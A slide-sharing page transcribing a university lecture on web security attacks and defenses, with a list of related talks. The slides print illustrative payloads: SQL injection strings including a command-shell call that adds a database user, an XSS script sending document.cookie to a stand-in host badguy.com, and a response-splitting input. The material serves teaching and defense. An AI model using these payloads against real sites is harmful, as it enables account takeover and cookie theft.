dawn song
play

Dawn Song dawnsong@cs.berkeley.edu 1 Class Projects Nov 12, no - PDF document

Nov 21, 2023 •370 likes •506 views

Web Security: Attacks & Defenses Dawn Song dawnsong@cs.berkeley.edu 1 Class Projects Nov 12, no class Nov 14, Milestone Report Due Electronic submission before class All electronic submission goes to summary gmail account

  1. Web Security: Attacks & Defenses Dawn Song dawnsong@cs.berkeley.edu 1 Class Projects • Nov 12, no class • Nov 14, Milestone Report Due – Electronic submission before class » All electronic submission goes to summary gmail account – Hardcopy submission in class • Nov 15, Milestone Report Feedback – 1-2:50pm – 10 min per group – Remember your time slot • Poster session: – Dec 5, 4-6pm, Woz – Report due by 4pm, Dec 5 » Electronic submission to summary gmail account » Hardcopy submission to office mailbox 2 Milestone Report • Enhance the proposal document • Clear problem definition, motivation, & scope • Proposed approach • Proposed metrics of success • Time plan 3

  2. Guest Lecture Planning • Last lecture: historical view in web security • This lecture: some other attacks & defenses in web security – Input validation – Session management • Oct 31, Guest Lecture (Raph, Google) – Trust metrics & sybil attacks in social networks – Pioneered work in this area • Nov 5, Guest Lecture (Ophir, Director of Security R&D at VMWare) – Security issues & applications in virtualization – More of an open discussion format • Nov 7, Guest Lecture (Kourosh, Team Lead of Google Traffic Quality Team) – AdFraud 4 Input Validation • SQL injection attack • XSS attack • HTTP Response Splitting attack 5 SQL Injection 6

  3. The setup • User input is used in SQL query • Example: login page (ASP) set ok = execute(“SELECT * FROM UserTable WHERE username= ′ ” & form(“user”) & “ ′ AND password= ′ ” & form(“pwd”) & “ ′ ” ); If not ok.EOF login success else fail; • Is this exploitable? 7 Dan Boneh Bad input • Suppose user = “ ′ or 1 = 1 -- ” (URL encoded) • Then scripts does: ok = execute( SELECT … WHERE username= ′ ′ or 1=1 -- … ) – The ‘- -’ causes rest of line to be ignored. – Now ok.EOF is always false. • The bad news: easy login to many sites this way. 8 Dan Boneh Even worse • Suppose user = ′ exec cmdshell ′ net user badguy badpwd ′ / ADD -- • Then script does: ok = execute( SELECT … WHERE username= ′ ′ exec … ) If SQL server context runs as “sa”, attacker gets account on DB server. 9 Dan Boneh

  4. Cross-Site Scripting (XSS) Attacks 10 The setup • User input is echoed into HTML response. • Example: search field – http://victim.com/search.php ? term = apple – search.php responds with: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term] ?> : . . . </BODY> </HTML> • Is this exploitable? 11 Dan Boneh Bad input • Problem: no validation of input term • Consider link: (properly URL encoded) http://victim.com/search.php ? term = <script> window.open( “http://badguy.com?cookie = ” + document.cookie ) </script> • What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> … </script> 3. Browser executes script: » Sends badguy.com cookie for victim.com 12 Dan Boneh

  5. So what? • Why would user click on such a link? – Phishing email in webmail client (e.g. gmail). – Link in doubleclick banner ad – … many many ways to fool user into clicking • What if badguy.com gets cookie for victim.com ? – Cookie can include session auth for victim.com » Or other data intended only for victim.com ⇒ Violates same origin policy 13 Dan Boneh Even worse • Attacker can execute arbitrary scripts in browser • Can manipulate any DOM component on victim.com – Control links on page – Control form fields (e.g. password field) on this page and linked pages. • Can infect other users: MySpace.com worm. 14 Dan Boneh MySpace.com (Samy worm) • Users can post HTML on their pages – MySpace.com ensures HTML contains no <script>, <body>, onclick, <a href=javascript://> – … but can do Javascript within CSS tags: <div style=“background:url(‘javascript:alert(1)’)”> And can hide “ javascript ” as “ java\nscript ” • With careful javascript hacking: – Samy’s worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend. – Samy had millions of friends within 24 hours. • More info: http://namb.la/popular/tech.html 15 Dan Boneh

  6. HTTP Response Splitting 16 The setup • User input echoed in HTTP header. • Example: Language redirect page (JSP) <% response.redirect(“/by_lang.jsp?lang=” + request.getParameter(“lang”) ) %> • Browser sends http://.../by_lang.jsp ? lang=french Server HTTP Response: (redirect) HTTP/1.1 302 Date: … Location: /by_lang.jsp ? lang=french • Is this exploitable? 17 Dan Boneh Bad input • Suppose browser sends: http://.../by_lang.jsp ? lang= “ french \n Content-length: 0 \r\n\r\n HTTP/1.1 200 OK ” Spoofed page (URL encoded) 18 Dan Boneh

  7. Bad input • HTTP response from server looks like: (redirect) HTTP/1.1 302 Date: … Location: /by_lang.jsp ? lang= french Content-length: 0 lang HTTP/1.1 200 OK Content-length: 217 Spoofed page 19 Dan Boneh So what? • What just happened: – Attacker submitted bad URL to victim.com » URL contained spoofed page in it – Got back spoofed page • So what? – Cache servers along path now store spoof of victim.com – Will fool any user using same cache server 20 Dan Boneh Defense • Lack of types, hidden assumption • Input validation – Taint tracking: figure out what variables need to be sanitized » Static taint analysis: Challenges? » Dynamic taint analysis: similar to perl tainting – Sanitization: how to sanitize variables » SQL injection » XSS attack » HTTP Response Splitting » Challenges: • Many different ways: normalization • Lack of specification: need to figure out how browser/server interprets 21

  8. Other Defenses • Client side XSS defense – Defense against reflected XSS attack » Check out-going requests with incoming responses for overlapping javascripts – Defense against XSS attack from stealing info » Check whether sensitive info is sent to another site • New browser tags – How does Mashup OS address XSS attack? – What other tags you may want to add? 22 Session Management • Cookie forgery • Cross-site Request Forgery (CSRF) 23 Cookie Forgery 24

  9. Cookies • Used to store state on user’s machine GET … Browser Server HTTP Header: Set-cookie: NAME= VALUE ; domain = (who can read) ; If expires= NULL: expires = (when expires) ; this session only secure = (only over SSL) Browser GET … Server Cookie: NAME = VALUE 25 Http is stateless protocol; cookies add state Cookies • Brower will store: – At most 20 cookies/site, 3 KB / cookie • Uses: – User authentication – Personalization (3 rd party cookies) – User tracking: e.g. Doubleclick 26 Attack • Example : Shopping cart software. Set-cookie: shopping-cart-total = 150 ($) • Is it vulnerable? – User edits cookie file (cookie poisoning): ($) Cookie: shopping-cart-total = 15 – … bargain shopping. • Similar behavior with hidden fields: <INPUT TYPE=“hidden” NAME=price VALUE=“150”> 27

  10. Prevalent (as of 2/2000) • D3.COM Pty Ltd: ShopFactory 5.8 • @Retail Corporation: @Retail • Adgrafix: Check It Out • Baron Consulting Group: WebSite Tool • ComCity Corporation: SalesCart • Crested Butte Software: EasyCart • Dansie.net: Dansie Shopping Cart • Intelligent Vending Systems: Intellivend • Make-a-Store: Make-a-Store OrderPage • McMurtrey/Whitaker & Associates: Cart32 3.0 • pknutsen@nethut.no: CartMan 1.04 • Rich Media Technologies: JustAddCommerce 5.0 • SmartCart: SmartCart • Web Express: Shoptron 1.2 28 Defense • When storing state on browser MAC data using server secret key. • .NET 2.0: – System.Web.Configuration.MachineKey » Secret web server key intended for cookie protection – HttpCookie cookie = new HttpCookie(name, val); HttpCookie encodedCookie = HttpSecureCookie.Encode (cookie); – HttpSecureCookie.Decode (cookie); 29 Cookie authentication Browser Web Server Auth server POST login.cgi Username & pwd Validate user auth= val Set-cookie: auth= val Store val GET restricted.html restricted.html Cookie: auth= val auth= val Check val If YES, YES/NO restricted.html 30

  11. Weak authenticators: security risk • Predictable cookie authenticator – Verizon Wireless - counter – Valid user logs in, gets counter, can view sessions of other users. • Weak authenticator generation: [Fu et al. ’01] – WSJ.com: cookie = {user, MAC k (user) } – Weak MAC exposes K from few cookies. • Apache Tomcat: generateSessionID() – MD5(PRNG) … but weak PRNG [GM’05]. – Predictable SessionID’s 31 Cross-Site Request Forgery (CSRF) 32 The Setup • A typical request for Alice to transfer $100 to Bob using bank.com: – GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1 • What if Maria wants to transfer $100,000 from Alice's account to her account? 33

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Software Security (II): Other types of software vulnerabilities Dawn Song 1 Dawn Song 3 #293

Software Security (II): Other types of software vulnerabilities Dawn Song 1 Dawn Song 3 #293

Computer Security Course. Dawn Computer Security Course. Dawn Song Song Software Security (II): Other types of software vulnerabilities Dawn Song 1 Dawn Song 3 #293 HRE-THR 850 1930 ALICE SMITH COACH SPECIAL INSTRUX: NONE Dawn Song

804 views • 61 slides
Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Request Forgery Dawn Song

Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Request Forgery Dawn Song

Computer Security Course. Dawn Song Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Request Forgery Dawn Song Example Application Consider a social networking site, GraceBook, that allows users to share happenings from

696 views • 54 slides
Software Security (I): Bufger-overfmow Attacks Dawn Song 1 Logistics New offjce hour

Software Security (I): Bufger-overfmow Attacks Dawn Song 1 Logistics New offjce hour

Computer Security Course. Dawn Computer Security Course. Dawn Song Song Software Security (I): Bufger-overfmow Attacks Dawn Song 1 Logistics New offjce hour Webcast Calcentral: select cs161 Dawn Song 2 Intro HTTP REQUEST

1.74k views • 41 slides
Security Analysis &amp; Threat Models Dawn Song Logistics Sessions You can go to any

Security Analysis &amp; Threat Models Dawn Song Logistics Sessions You can go to any

Introduction Security Analysis &amp; Threat Models Dawn Song Logistics Sessions You can go to any sessions Project groups You can switch groups for difgerent projects Wait List Dawn Song Evolving Threats Dawn Song

957 views • 49 slides
Overview Dawn Song Teaching Team Dawn Song What is

Overview Dawn Song Teaching Team Dawn Song What is

CCS161 Computer Security Overview Dawn Song Teaching Team Dawn Song What is Computer Security About? General goals: Allow intended use of

407 views • 28 slides
Web Security: Vulnerabilities &amp; Attacks Slide credit: John Mitchell Dawn Song Security User

Web Security: Vulnerabilities &amp; Attacks Slide credit: John Mitchell Dawn Song Security User

Computer Security Course. Dawn Computer Security Course. Dawn Song Song Web Security: Vulnerabilities &amp; Attacks Slide credit: John Mitchell Dawn Song Security User Interface Dawn Song Safe to type your password?

652 views • 47 slides
Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is

Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is

Computer Security Course. Dawn Computer Security Course. Dawn Song Song Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is Cross-site Scripting (XSS)? Vulnerability in web application that

760 views • 53 slides
Vulnerability Analysis (IV): Program Verifjcation Slide credit: Vijay Dawn Song DSilva

Vulnerability Analysis (IV): Program Verifjcation Slide credit: Vijay Dawn Song DSilva

Computer Security Course. Dawn Computer Security Course. Dawn Song Song Vulnerability Analysis (IV): Program Verifjcation Slide credit: Vijay Dawn Song DSilva Program Verifjcation Dawn Song Program Verifjcation How to prove a

768 views • 60 slides
Principle of Least Privilege Dawn Song Principle of least privilege Privilege Ability to

Principle of Least Privilege Dawn Song Principle of least privilege Privilege Ability to

Computer Security Course. Dawn Computer Security Course. Dawn Song Song Principle of Least Privilege Dawn Song Principle of least privilege Privilege Ability to access or modify a resource Principle of least privilege A

429 views • 39 slides
A First Step towards the Automatic Generation of Security Protocols Adrian Perrig and Dawn Song

A First Step towards the Automatic Generation of Security Protocols Adrian Perrig and Dawn Song

A First Step towards the Automatic Generation of Security Protocols Adrian Perrig and Dawn Song CMU, UCB Adrian Perrig and Dawn Song NDSS - APG 1 Difficulties in the Design of Security Protocols Usually ad-hoc, lacking formalism. Hidden

324 views • 19 slides
Dawn Song dawnsong@cs.berkeley.edu 1 The Problem How to ensure the execution of a given

Dawn Song dawnsong@cs.berkeley.edu 1 The Problem How to ensure the execution of a given

Analysis and Defense against Privacy- Breaching Code Dawn Song dawnsong@cs.berkeley.edu 1 The Problem How to ensure the execution of a given program will not leak private information? Why should we care? Users download/execute

300 views • 8 slides
Dawn Song dawnsong@cs.berkeley.edu 1 Part II OS &amp; Web Security OS Security Web

Dawn Song dawnsong@cs.berkeley.edu 1 Part II OS &amp; Web Security OS Security Web

Safe Extension Dawn Song dawnsong@cs.berkeley.edu 1 Part II OS &amp; Web Security OS Security Web Security More esoteric topics Click fraud, etc. Reputation systems &amp; trust metrics Few papers, but local experts

420 views • 5 slides
Dawn Song dawnsong@cs.berkeley.edu Thanks for Benny Pinkas for some of the slides 1 Project

Dawn Song dawnsong@cs.berkeley.edu Thanks for Benny Pinkas for some of the slides 1 Project

Privacy-preserving Distributed Information Sharing and Secure Function Evaluation Dawn Song dawnsong@cs.berkeley.edu Thanks for Benny Pinkas for some of the slides 1 Project Milestone report Do not affect grade Just for status

153 views • 13 slides
So)ware Security: Vulnerability Analysis Dawn Song Finding

So)ware Security: Vulnerability Analysis Dawn Song Finding

Computer Security Course. Dawn

539 views • 32 slides
Dawn Song dawnsong@cs.berkeley.edu 1 What is a botnet? An army of compromised hosts

Dawn Song dawnsong@cs.berkeley.edu 1 What is a botnet? An army of compromised hosts

Botnet Analysis &amp; Defense Dawn Song dawnsong@cs.berkeley.edu 1 What is a botnet? An army of compromised hosts (bots) coordinated via a command and control center (C&amp;C). The perpetrator is usually called a botmaster.

409 views • 11 slides
Here are the songs we sang this Sunday. This shows the song name, the artist who performed the

Here are the songs we sang this Sunday. This shows the song name, the artist who performed the

Here are the songs we sang this Sunday. This shows the song name, the artist who performed the song, and the cd that contains the song. We Will Hold On Paul Baloche Glorious By Faith Keith &amp; Kristyn Getty Awaken the Dawn

526 views • 31 slides
Is Your Caching Resolver Polluting the Internet? Duane Wessels The Measurement Factory, and

Is Your Caching Resolver Polluting the Internet? Duane Wessels The Measurement Factory, and

Is Your Caching Resolver Polluting the Internet? Duane Wessels The Measurement Factory, and CAIDA wessels@measurement-factory.com September 2004 SIGCOMM 2004 NetTs 0 The Measurement Factory A Disclaimer This data comes from monitoring

882 views • 23 slides
SIMPLE Multiparty Chat draft-niemi-simple-chat-04.txt Aki Niemi aki.niemi@nokia.com Tuesday,

SIMPLE Multiparty Chat draft-niemi-simple-chat-04.txt Aki Niemi aki.niemi@nokia.com Tuesday,

SIMPLE Multiparty Chat draft-niemi-simple-chat-04.txt Aki Niemi aki.niemi@nokia.com Tuesday, March 21, 2006 IETF65 SIMPLE WG Background Multiparty, or multi-user chat protocols have existed since late 1980s Some features common

339 views • 9 slides
Semantic Dependency Graph Parsing Using Tree Approximations eljko Agi Alexander Koller

Semantic Dependency Graph Parsing Using Tree Approximations eljko Agi Alexander Koller

Semantic Dependency Graph Parsing Using Tree Approximations eljko Agi Alexander Koller Stephan Oepen Center for Language Technology, University of Copenhagen Department of Linguistics, University of Potsdam

1.29k views • 32 slides
Introducing IPv6-only in the Internet: Balkanisation or Translation? Alain.Durand@sun.com

Introducing IPv6-only in the Internet: Balkanisation or Translation? Alain.Durand@sun.com

Introducing IPv6-only in the Internet: Balkanisation or Translation? Alain.Durand@sun.com When will IPv6-only deployment happen? Hypothesis 1 1st node is All IPv4 nodes dual-stack speak also IPv6 IPv4-only IPv4 &amp; IPv6 IPv6-only

675 views • 25 slides
Wh y u se Ba y esian data anal y sis ? FU N DAME N TAL S OF BAYE SIAN DATA AN ALYSIS IN R Rasm u

Wh y u se Ba y esian data anal y sis ? FU N DAME N TAL S OF BAYE SIAN DATA AN ALYSIS IN R Rasm u

Wh y u se Ba y esian data anal y sis ? FU N DAME N TAL S OF BAYE SIAN DATA AN ALYSIS IN R Rasm u s Bth Data Scientist Ba y es is fle x ible 1. Yo u can incl u de information so u rces in addition to the data . 2. Yo u can make an y

857 views • 57 slides
Implementation effort OPES WG meeting on 57 th IETF in Wien, sterreich Martin Stecher

Implementation effort OPES WG meeting on 57 th IETF in Wien, sterreich Martin Stecher

Implementation effort OPES WG meeting on 57 th IETF in Wien, sterreich Martin Stecher (martin.stecher@webwasher.com) Alex Rousskov (rousskov@measurement-factory.com) 2003-07-15 Implementation effort 1 OPES WG on 57 th IETF in Vienna Content

689 views • 11 slides
Improving Privacy Protection in the area of Behavioural Targeting Privacy &amp; Innovation, Hong

Improving Privacy Protection in the area of Behavioural Targeting Privacy &amp; Innovation, Hong

Dr. Frederik Borgesius Improving Privacy Protection in the area of Behavioural Targeting Privacy &amp; Innovation, Hong Kong 8 June 2015 Behavioural targeting: tracking Targeting Targeting Targeting Targeting Tracking Tracking Current

456 views • 24 slides
Reports on Demand Makes Benchmarking Your Renewals Simple Webinar: March 23 rd @ 11am EDT

Reports on Demand Makes Benchmarking Your Renewals Simple Webinar: March 23 rd @ 11am EDT

Reports on Demand Makes Benchmarking Your Renewals Simple Webinar: March 23 rd @ 11am EDT Advisens automated on-demand reports make benchmarking as easy as 1-2-3. Why do it yourself when a summary report illustrating premiums, limits,

539 views • 20 slides

More recommend